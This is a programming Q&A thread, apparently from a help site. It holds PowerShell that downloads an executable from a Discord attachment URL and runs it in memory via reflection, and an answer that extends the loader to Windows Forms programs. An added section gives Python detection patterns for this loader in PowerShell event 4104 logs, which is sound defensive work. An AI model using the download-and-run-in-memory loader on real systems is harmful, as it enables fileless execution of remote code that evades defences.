Hello, I found this code for executing .NET exe files in memory:
$ByteArray = (Invoke-WebRequest "https://cdn.discordapp.com/attachments/1033846522636410930/1036311327850901636/DOTNETcsharpErrorBox.exe").Content
# Base64
$Base64String = [System.Convert]::ToBase64String($ByteArray);
$PsEBytes = [System.Convert]::FromBase64String($Base64String)
# Run EXE in memory
$assembly = [System.Reflection.Assembly]::Load($PsEBytes)
# Get the static method that is the executable's entry point.
# Note:
#  * Assumes 'Program' as the class name,
#    and a static method named 'Main' as the entry point.
#  * Should there be several classes by that name, the *first*
#    - public or non-public - type returned is used.
#    If you know the desired type's namespace, use, e.g.
#    $assembly.GetType('MyNameSpace.Program').GetMethod(...)
$entryPointMethod =
  $assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').
    GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')
# Now you can call the entry point.
# This example passes two arguments, 'foo' and 'bar'
$entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))
It works with .NET C# console application exe files, but I tried a .NET C# form application exe file and it gives me this error:
You cannot call a method on a null-valued expression.
At C:\Users\sadettin\Desktop\PE.ps1:30 char:1
+ $entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))
CategoryInfo : InvalidOperation: (:) [], RuntimeException
FullyQualifiedErrorId : InvokeMethodOnNull
But it works with a console application exe file!? It's weird...
I think the problem comes from this part: $entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))
What should I do or add to this code? I'm new; maybe there is an easy thing that I don't know.
CodePudding user response:
Your symptom implies that variable $entryPointMethod contains $null, which in turn implies that the following call returned $null:
$assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').
  GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')
This means that either no class named Program exists in the assembly or that it has no method named Main.
If your assembly has a command-line entry point, it does have a Main method, but not necessarily inside a Program class: while class name Program is common, a given application is free to choose a different one.
Also, Windows Forms applications typically do not accept command-line arguments, so even if you identify the correct method, an invocation such as $entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar'))) may fail.
Therefore, try the following:
# Find ANY 'Main' method, regardless of the name of the class it is a part of.
$entryPointMethod =
  @(
    $assembly.GetTypes().GetMethod(
      'Main',
      [Reflection.BindingFlags] 'Static, Public, NonPublic'
    )
  ) -ne $null
# $entryPointMethod is always an array here (possibly empty), so test its count
# rather than comparing it to $null.
if ($entryPointMethod.Count -eq 0) {
  throw "No 'Main' method found; the assembly doesn't have a CLI entry point."
} elseif ($entryPointMethod.Count -gt 1) {
  throw "MULTIPLE 'Main' methods found."
}
# Now you can call the entry point, without arguments in this example.
$entryPointMethod.Invoke($null, $null)
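
From the defender's side, the pattern in this thread (obtain bytes, pass them to [System.Reflection.Assembly]::Load, then look up Main by reflection) shows up in PowerShell script block logging (event ID 4104). The following is an added example, not part of the question or the answer: a Python triage routine that reassembles 4104 fragments by ScriptBlockId before matching. The regexes are heuristics chosen for this example, and the events are constructed dicts that use the 4104 field names ScriptBlockId, MessageNumber and ScriptBlockText.

```python
import re
from collections import defaultdict

# Heuristic indicators (assumptions of this example) for the three loader stages.
STAGES = {
    "byte_source": re.compile(r"Invoke-WebRequest|DownloadData|FromBase64String", re.I),
    # Assembly.Load whose argument is not a quoted assembly name, so likely a byte[].
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load\s*\(\s*(?![\s'\"])", re.I),
    "entry_lookup": re.compile(r"\.EntryPoint\b|GetMethod\s*\(\s*['\"]Main['\"]", re.I),
}

def strip_comments(script):
    """Drop <# #> blocks and '#' comments so commented-out code is ignored."""
    script = re.sub(r"<#.*?#>", "", script, flags=re.S)
    return re.sub(r"(?m)(^|\s)#.*$", r"\1", script)

def reassemble(events):
    """Join the 4104 fragments of each script block in MessageNumber order."""
    blocks = defaultdict(list)
    for ev in events:
        blocks[ev["ScriptBlockId"]].append(ev)
    return {
        sbid: "".join(p["ScriptBlockText"]
                      for p in sorted(parts, key=lambda p: p["MessageNumber"]))
        for sbid, parts in blocks.items()
    }

def triage(events):
    """Map ScriptBlockId -> stages seen, for blocks that load an assembly from bytes."""
    hits = {}
    for sbid, text in reassemble(events).items():
        code = strip_comments(text)
        seen = sorted(name for name, rx in STAGES.items() if rx.search(code))
        if "reflective_load" in seen:
            hits[sbid] = seen
    return hits

# Constructed sample events (placeholder URL and IDs, not from a real log).
SAMPLE_EVENTS = [
    {"ScriptBlockId": "blk-A", "MessageNumber": 2, "ScriptBlockText":
     "flection.Assembly]::Load($b)\n$a.GetTypes().GetMethod('Main', 'Static, NonPublic')\n"},
    {"ScriptBlockId": "blk-A", "MessageNumber": 1, "ScriptBlockText":
     "$b = (Invoke-WebRequest 'https://example.invalid/app.exe').Content\n$a = [System.Re"},
    {"ScriptBlockId": "blk-B", "MessageNumber": 1, "ScriptBlockText":
     "# [Reflection.Assembly]::Load($bytes)\n[Reflection.Assembly]::Load('System.Windows.Forms')\n"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

In the sample, the load call is split across two fragments of blk-A, so matching each event on its own would miss it. blk-B is not reported because its only byte-style load is commented out and the live call loads an assembly by name.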